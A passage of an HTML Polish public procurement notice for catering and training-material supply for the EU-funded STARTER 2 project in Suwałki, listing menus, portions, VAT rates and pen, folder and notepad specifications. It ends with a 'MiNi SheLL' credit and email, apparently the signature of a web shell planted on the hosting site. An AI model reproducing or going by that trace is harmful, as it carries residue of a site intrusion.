ze zm.),c.świadczenia usługi wyłącznie przy użyciu produktów spełniających normy jakości produktów spożywczych,d.dostarczenia własnych naczyń, sztućców odpowiednio do liczby uczestników szkolenia; Użyte naczynia winny być czyste, nieuszkodzone;e.zapewnienia osób, które przygotują usługę oraz uprzątną i wywiozą pozostałości po zakończonej usłudze,f.estetycznego podawania posiłków,g.dostarczania posiłków na miejsce wskazane przez Zamawiającego najpóźniej na 30 min. przed rozpoczęciem szkolenia/ kursu;h.zebrania naczyń oraz resztek pokonsumpcyjnych; uprzątnięcia i wywiezienia wszystkich śmieci pozostałych po posiłkach.4.Zamawiający każdorazowo, zlecając wykonanie poszczególnych usług, określi dokładnie termin  (z podaniem daty i godzin świadczenia usługi), miejsce, liczbę uczestników oraz rodzaj menu, przy uwzględnieniu, że:- szacunkowa liczebność grupy szkoleniowej: 25 osób,- łączna liczba dni szkoleniowych: 4 dni,
- szacunkowa ilość zestawów: 100 zestawów (jako zestaw rozumie się przerwę kawową + lunch, o którym mowa w pkt. 6, 7, 8)- miejsce świadczenia usługi:  Suwałki-Augustów.5.W przypadku nie podjęcia szkolenia przez osobę skierowaną na szkolenie, rezygnacji kandydata-tki ze szkolenia mimo wcześniejszych deklaracji uczestnictwa lub niestawienia się kandydata-tki na szkoleniu pomimo wezwania Zamawiającego, Wykonawca jest zobowiązany do skalkulowania kosztu usługi żywienia, który stanowić będzie iloczyn kosztu usługi żywienia dla jednej osoby oraz rzeczywistej liczby osób, które korzystały z usługi żywienia. 6.W ramach świadczonej usługi, Wykonawca będzie zobowiązany do zorganizowania:
a.przerwy kawowej  23% VAT;b.lunchu  8% VAT.7.W ramach usługi, o której mowa w punkcie 6a, Wykonawca będzie zobowiązany do zapewnienia każdej osobie uczestniczącej w szkoleniu, co najmniej:a)1 filiżanki kawy rozpuszczalnej 250 ml;b)1 filiżanki herbaty czarnej 250 ml;c)Ciastka (minimum dwa rodzaje - po 5 szt. każdego rodzaju);d)Cukier biały 20g,e)Cytryna (pokrojona, podawana na talerzykach) 1plaster, f)Mleko 30 ml , g)Woda gazowana i niegazowana, w butelkach 0,5 l, 1 szt.8.W ramach usługi, o której mowa w punkcie 6b, Wykonawca zobowiązany będzie   do zapewnienia każdej osobie uczestniczącej w szkoleniu: 
Dzień	Zestawy obiadowe:1.Karkówka po myśliwsku 120g/os ,Ziemniaki  200g/os, Surówka z białej kapusty 150g/os, Napój owocowy 300ml/os.2.Zrazy wieprzowe 200g/os, Ziemniaki 200g/os, Buraczki na ciepło 150g/os, Napój owocowy 300ml/os.3.Roladki drobiowe z farszem mięsnym 200g/os. Ziemniaki 200g/os. Jarzynka z marchewki z groszkiem na maśle 150g/os. Napój owocowy 300ml/os. 4.Pieczeń wieprzowa w sosie korzennym 200 g/os, Ziemniaki 200g/os, Surówka z kapusty pekińskiej, pora, papryki 150 g/os, Napój owocowy 300 ml/os.9.Dania winny być podawane na gorąco.10.Zamawiający zastrzega sobie w trakcie realizacji usługi prawo do zgłaszania uwag, które Wykonawca zobowiązany będzie uwzględnić.11.Wykonawca zobowiązuje się do wskazania Zamawiającemu osób do kontaktu oraz koordynujących realizację zamówienia i odpowiedzialnych za realizację usługi  podczas szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.30.00.00-3, 55.32.10.00-6, 55.52.12.00-0, 55.52.00.00-1, 55.32.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> IV GRUPA SZKOLENIOWA - usługa żywienia podczas szkolenia Mój biznes organizowanego  w ramach projektu pt. STARTER 2 nr WND-POKL.06.02.00-20-130-13..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Poprzez świadczenie usług żywienia Zamawiający rozumie usługę przygotowywania, dostarczania i podawania posiłków w miejscu wskazanym przez Zamawiającego.2.Świadczenie usług żywienia będzie odbywało się w oparciu o poszczególne zlecenia wystawiane przez upoważnionego pracownika Zamawiającego, w okresie obowiązywania umowy (tj. od dnia zawarcia umowy do dnia 31.12.2014 r.), w ramach organizowanego szkolenia.3.W ramach zamówienia Wykonawca zobowiązany jest do:
a.przygotowania, dowozu i podania posiłków w terminie (dzień, godzina) i miejscu, w którym będzie odbywało się szkolenie,
b.przestrzegania przepisów prawnych w zakresie przechowywania i przygotowywania artykułów spożywczych (m.in. ustawy z dnia 25 sierpnia 2006r. o bezpieczeństwie żywności i żywienia Dz.U. z 2010r. Nr 136 poz. 914 ze zm.),
c.świadczenia usługi wyłącznie przy użyciu produktów spełniających normy jakości produktów spożywczych,
d.dostarczenia własnych naczyń, sztućców odpowiednio do liczby uczestników szkolenia; Użyte naczynia winny być czyste, nieuszkodzone;e.zapewnienia osób, które przygotują usługę oraz uprzątną i wywiozą pozostałości po zakończonej usłudze,
f.estetycznego podawania posiłków,g.dostarczania posiłków na miejsce wskazane przez Zamawiającego najpóźniej na 30 min. przed rozpoczęciem szkolenia- kursu;h.zebrania naczyń oraz resztek pokonsumpcyjnych; uprzątnięcia i wywiezienia wszystkich śmieci pozostałych po posiłkach.4.Zamawiający każdorazowo, zlecając wykonanie poszczególnych usług, określi dokładnie termin  (z podaniem daty i godzin świadczenia usługi), miejsce, liczbę uczestników oraz rodzaj menu, przy uwzględnieniu, że:
- szacunkowa liczebność grupy szkoleniowej: 25 osób,- łączna liczba dni szkoleniowych: 4 dni,- szacunkowa ilość zestawów: 100 zestawów (jako zestaw rozumie się przerwę kawową + lunch, o którym mowa w pkt. 6, 7, 8), - miejsce świadczenia usługi:  Suwałki-Augustów.5.W przypadku nie podjęcia szkolenia przez osobę skierowaną na szkolenie, rezygnacji kandydata/tki ze szkolenia mimo wcześniejszych deklaracji uczestnictwa lub niestawienia się kandydata/tki na szkoleniu pomimo wezwania Zamawiającego, Wykonawca jest zobowiązany do skalkulowania kosztu usługi żywienia, który stanowić będzie iloczyn kosztu usługi żywienia dla jednej osoby oraz rzeczywistej liczby osób, które korzystały z usługi żywienia. 6.W ramach świadczonej usługi, Wykonawca będzie zobowiązany do zorganizowania:a)przerwy kawowej  23% VAT;b)lunchu  8% VAT.7.W ramach usługi, o której mowa w punkcie 6a, Wykonawca będzie zobowiązany do zapewnienia każdej osobie uczestniczącej w szkoleniu, co najmniej:a)1 filiżanki kawy rozpuszczalnej 250 ml;b)1 filiżanki herbaty czarnej 250 ml;c)Ciastka (minimum dwa rodzaje - po 5 szt. każdego rodzaju);d)Cukier biały 20g, e)Cytryna (pokrojona, podawana na talerzykach) 1plaster, f)Mleko 30 ml , g)Woda gazowana i niegazowana, w butelkach 0,5 l, 1 szt.8.W ramach usługi, o której mowa w punkcie 6b, Wykonawca zobowiązany będzie   do zapewnienia każdej osobie uczestniczącej w szkoleniu: 
Dzień	Zestawy obiadowe:1.Karkówka po myśliwsku 120g-os , Ziemniaki  200g-os, Surówka z białej kapusty 150g-os, Napój owocowy 300ml/os, 2.Zrazy wieprzowe 200g-os, Ziemniaki 200g-os, Buraczki na ciepło 150g-os, Napój owocowy 300ml-os. 3.Roladki drobiowe z farszem mięsnym 200g-os, Ziemniaki 200g/os, Jarzynka z marchewki z groszkiem na maśle 150g-os, Napój owocowy 300ml-os4.Pieczeń wieprzowa w sosie korzennym 200 g-os, Ziemniaki 200g-os, Surówka z kapusty pekińskiej, pora, papryki 150 g-os.Napój owocowy 300 ml-os.9.Dania winny być podawane na gorąco.
10.Zamawiający zastrzega sobie w trakcie realizacji usługi prawo do zgłaszania uwag, które Wykonawca zobowiązany będzie uwzględnić.11.	Wykonawca zobowiązuje się do wskazania Zamawiającemu osób do kontaktu oraz koordynujących realizację zamówienia i odpowiedzialnych za realizację usługi  podczas szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.30.00.00-3, 55.32.10.00-6, 55.52.12.00-0, 55.52.00.00-1, 55.32.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Usługa opracowania wzorników i dostawa 240 kompletów materiałów szkoleniowych dla uczestników projektu w ramach doradztwa indywidualnego w projekcie pt.:  STARTER 2 nr WND-POKL.06.02.00-20-13013..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługa opracowania wzorników i dostawa 240 kompletów materiałów szkoleniowych dla uczestników projektu w ramach doradztwa indywidualnego w projekcie pt.:  STARTER 2 nr WND-POKL.06.02.00-20-13013.1 komplet  =  długopis, teczka A4, blok notatnikowy A4 (zgodne z opisem zamieszczonym w poniższej tabeli)
Wyszczególnienie	1.Długopis.Opis:  Długopis metalowy o prostym kształcie. Wkład wymienny, wielkopojemny miękko piszący, z końcówką od 0,7-1mm. Wkład chowany za pomocą mechanizmu automatycznego, długopis lakierowany, barwiony, kolor do uzgodnienia.
Nadruk: w jednym kolorze: Logo programu PO KL, logo UE.	sztuk	240. 2.Teczka A4  
Opis : Teczka skrzydłowa A4 z gumką, wykonana z twardej tektury o grubości 2 mm, kolorowa oklejka, pokryta folią polipropylenową, szerokość do 40mm. Kolor  teczki do uzgodnienia.Nadruk:. na okładce przedniej: logotyp Programu POKL, logo UE, logo ARES,  napis Projekt współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego; oraz nazwa projektu: STARTER 2.   Kolor  teczki do uzgodnienia.sztuk 240. 3.Blok notatnikowy - A4.Opis: papier offset 80g-m2 klejony na górze , papier w kratkę , nadruk na każdej kartce w jednym kolorze w górnej i dolnej części kartki, ilość kartek min 50, okładka dwustronna.
Nadruk: jeden kolor:  Logo programu PO KL, logo UE, logo ARES,  napis Projekt współfinansowany przez Unię Europejska w ramach Europejskiego Funduszu Społecznego, nazwa projektu: STARTER 2.  sztuk 240. Liczba dostaw: 1Założenia:1)Wykonawca dostarczy fabrycznie nowe i nieużywane ww. materiały spełniające wymogi techniczne i ilościowe.2)Wykonawca opracuje wzorniki, wykona i dostarczy materiały szkoleniowe z zastrzeżeniem uzyskania wcześniejszego zatwierdzenia wzorników materiałów szkoleniowych przez Zamawiającego.3)Przedmiot zamówienia obejmuje koszty transportu i ubezpieczenia transportu do Zamawiającego. 4)Miejscem dostawy jest: Biuro projektu pt. STARTER 2 nr WND-POKL.06.02.00-20-130/13, ul. Noniewicza 42 a, 16-400 Suwałki..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 30.19.00.00-7, 79.82.25.00-7, 79.82.30.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Usługa opracowania wzorników i dostawa 100 kompletów materiałów szkoleniowych dla uczestników szkolenia Mój biznes w ramach projektu pt.:  STARTER 2 nr WND-POKL.06.02.00-20-130-13..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługa opracowania wzorników i dostawa 100 kompletów materiałów szkoleniowych dla uczestników szkolenia Mój biznes w ramach projektu pt.:  STARTER 2 nr WND-POKL.06.02.00-20-130-13.1 komplet  =  długopis, teczka A4, blok notatnikowy A4 (zgodne z opisem zamieszczonym w poniższej tabeli)Wyszczególnienie: 1.Długopis.Opis: Długopis metalowy o prostym kształcie. Wkład wymienny, wielkopojemny miękko piszący, z końcówką od 0,7-1mm. Wkład chowany za pomocą mechanizmu automatycznego, długopis lakierowany, barwiony, kolor do uzgodnienia.
Nadruk: w jednym kolorze: Logo programu PO KL, logo UE.	sztuk	100. 2. Teczka A4  
Opis : Teczka skrzydłowa A4 z gumką, wykonana z twardej tektury 
o grubości 2 mm, kolorowa oklejka, pokryta folią polipropylenową, szerokość do 40mm. Kolor  teczki do uzgodnienia.
Nadruk:. na okładce przedniej: logotyp Programu POKL, logo UE, logo ARES,  napis Projekt współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego; oraz nazwa projektu: STARTER 2.   Kolor  teczki do uzgodnienia.	sztuk	100
3. Blok notatnikowy - A4.Opis: papier offset 80g-m2 klejony na górze , papier w kratkę , nadruk na każdej kartce w jednym kolorze w górnej i dolnej części kartki, ilość kartek min 50, okładka dwustronna.Nadruk: jeden kolor:  Logo programu PO KL, logo UE, logo ARES,  napis Projekt współfinansowany przez Unię Europejska w ramach Europejskiego Funduszu Społecznego, nazwa projektu: STARTER 2.   sztuk	100.Liczba dostaw: 1.Założenia:1)Wykonawca dostarczy fabrycznie nowe i nieużywane ww. materiały spełniające wymogi techniczne i ilościowe.2)Wykonawca opracuje wzorniki, wykona i dostarczy materiały szkoleniowe z zastrzeżeniem uzyskania wcześniejszego zatwierdzenia wzorników materiałów szkoleniowych przez Zamawiającego.3)Przedmiot zamówienia obejmuje koszty transportu i ubezpieczenia transportu do Zamawiającego. 4)Miejscem dostawy jest: Biuro projektu pt. STARTER 2 nr WND-POKL.06.02.00-20-130-13, ul. Noniewicza 42 a, 16-400 Suwałki..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 30.19.00.00-7, 79.82.25.00-7, 79.82.23.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com